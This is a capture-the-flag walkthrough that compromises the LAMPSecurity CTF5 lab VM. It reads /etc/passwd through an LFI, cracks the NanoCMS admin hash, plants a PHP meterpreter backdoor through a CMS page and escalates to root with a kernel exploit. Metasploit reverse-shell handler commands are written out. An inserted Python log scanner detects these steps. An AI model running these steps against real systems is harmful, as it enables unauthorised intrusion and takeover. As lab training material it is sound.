April 27, 2019

LAMPSecurity CTF5 Walkthrough



Hello readers, today we are going to solve another CTF challenge, “LAMPSecurity CTF5” (download it from here //www.vulnhub.com/entry/lampsecurity-ctf5,84). This is a beginner-level challenge. We will try to escalate privileges and gain root access. So let’s get started.
List of actions:
  • Scan the network
  • Enumerate HTTP service
  • Scan the web application with Nikto for more information
  • Identify the vulnerable CMS application
  • Create PHP BackDoor using msfvenom
  • Upload and execute the backdoor inside the target
  • Get TTY shell access using python
  • Exploit the target
  • Gain the root privilege

Scan the network
First, discover the target with the netdiscover tool.



We have found our target: 172.16.2.169



Now open the Kali machine and scan the target for open ports and running services using nmap.



Based on the above result, we can see that multiple services are running on different open ports (22, 25, 80, 110, 111, 139, 143, 445, 901, 3306, 37459).

Enumerate HTTP service
As we can see, the HTTP service is running on this VM, so let’s start browsing it.
Browsing to 172.16.2.169 gives us a web page with a Phake Organization header and a navigation menu bar.



Scan the web application with Nikto for more information



The above scan shows that the application is vulnerable to LFI, so we try to get the passwd file with the following input.



We have successfully retrieved the content of the passwd file, which we can use later if required.

Identify the vulnerable CMS application
Clicking on the Blog tab redirects to 172.16.2.169/~andy/



If we look closely at the bottom of the page, we see it is powered by NanoCMS, which is a really outdated CMS that is no longer used because of its security problems. We will try to find a vulnerability related to this CMS and exploit it.
After googling it, we got the result below.



Let’s go to the site and understand the vulnerability.
According to SecurityFocus, NanoCMS is vulnerable to a password hash information disclosure vulnerability at the path below.
/data/pagesdata.txt



Now append the path to the URL and see what we get.



The above page discloses the admin password hash. We will try to crack the MD5 hash on hashkiller.co.uk



Result




We have successfully cracked the hash; the password for the admin account is “shannon”.
Now click on Admin Login to get the login page of the admin panel.



Enter the admin credentials and log in to the account.
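
Seen from the defender's side, the Nikto scan, the passwd retrieval through LFI and the request for /data/pagesdata.txt described above all leave traces in the Apache access log. The following is an added example, not part of the original walkthrough: a small Python scanner over combined-format log lines. The sample log lines, the `file` parameter name and the rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache combined log format: client, request line, status, size, referer, user agent.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"$')

def normalise(uri):
    """Percent-decode repeatedly (catches double encoding) and lowercase."""
    for _ in range(3):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri.lower()

# One rule per walkthrough step that is visible in the access log (rule names are made up here).
RULES = {
    "nikto-scan": lambda uri, ua: "nikto" in ua.lower(),
    "lfi-passwd": lambda uri, ua: "etc/passwd" in uri and ("../" in uri or "\x00" in uri),
    "nanocms-hash-file": lambda uri, ua: uri.split("?")[0].endswith("/data/pagesdata.txt"),
}

def scan(lines):
    """Return (client, rule, status) per rule hit; status 200 means the content was served."""
    hits = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        client, _method, raw_uri, status, ua = m.groups()
        uri = normalise(raw_uri)
        hits += [(client, name, int(status)) for name, rule in RULES.items() if rule(uri, ua)]
    return hits

# Constructed sample lines (not taken from the target's real logs).
SAMPLE = [
    '172.16.2.20 - - [27/Apr/2019:10:00:01 +0000] "GET /index.php HTTP/1.1" 200 1843 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '172.16.2.155 - - [27/Apr/2019:10:02:11 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 287 "-" "Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000123)"',
    '172.16.2.155 - - [27/Apr/2019:10:05:40 +0000] "GET /index.php?file=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 2101 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '172.16.2.155 - - [27/Apr/2019:10:09:03 +0000] "GET /~andy/data/pagesdata.txt HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '172.16.2.155 - - [27/Apr/2019:10:30:00 +0000] "GET /~andy/data/pagesdata.txt HTTP/1.1" 403 199 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for client, rule, status in scan(SAMPLE):
        print(f"{client} {rule} status={status}" + (" SERVED" if status == 200 else ""))
```

A hit on nanocms-hash-file with status 200 means the hash file was actually served, so the admin password should be treated as exposed; a 403 on the same path is what the log shows once access to the data directory is denied.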



Create PHP BackDoor using msfvenom
In the admin panel window we get the New Page option; let’s click on it.



This page allows us to add content to the website. Using this feature, we will try to upload a backdoor and create a meterpreter session.
Execute the following msfvenom command, copy the backdoor starting from <?php to die(); and paste it into the new page content.



Give the Page Title any name (e.g. exploitable) and then click on the Add Page button.



We have successfully added the backdoor, and after visiting the website we can see it in the navigation menu.



Now open msfconsole and run the exploit:
msf5 > use exploit/multi/handler
msf5 > set payload php/meterpreter/reverse_tcp
msf5 > set lhost 172.16.2.155
msf5 > set lport 4444
msf5 > run



Now open the website and load the exploit



We have successfully created the meterpreter session.



Upload and execute the backdoor inside the target
Run the sysinfo command to get the system version.



The above result shows that the server is running Linux version 2.6.23.1-42. Using this information, we will try to find out whether any exploit exists to escalate to root privileges.
After multiple searches, we found the exploit below to escalate privileges on this version of Linux.



Now download the exploit using the wget command.



Compile the exploit using the gcc compiler.



Get TTY shell access using python
Now get back to the meterpreter session and navigate to the /tmp folder.
cd /t



Now upload the exploit from the Kali machine to the target using the meterpreter session.
upload /root/exploit exploit



Now go to the shell again.








Execute the Python one-liner to get a Bash shell.




We have successfully got the restricted bash shell. Now navigate to /tmp and run the ls -l command to check the uploaded exploit.



Exploit the target
Now run the command below to exploit the target:
env - ./exploit




Gain the root privilege
Run the id command to verify that we are the root user.



Great!! We have successfully gained root privileges and completed the challenge. Please let me know if you have any doubts about this article. I will see you soon with another CTF. Happy Hacking!!


1 comment:

  1. I admire this article for the well-researched content and excellent wording. custom erp software
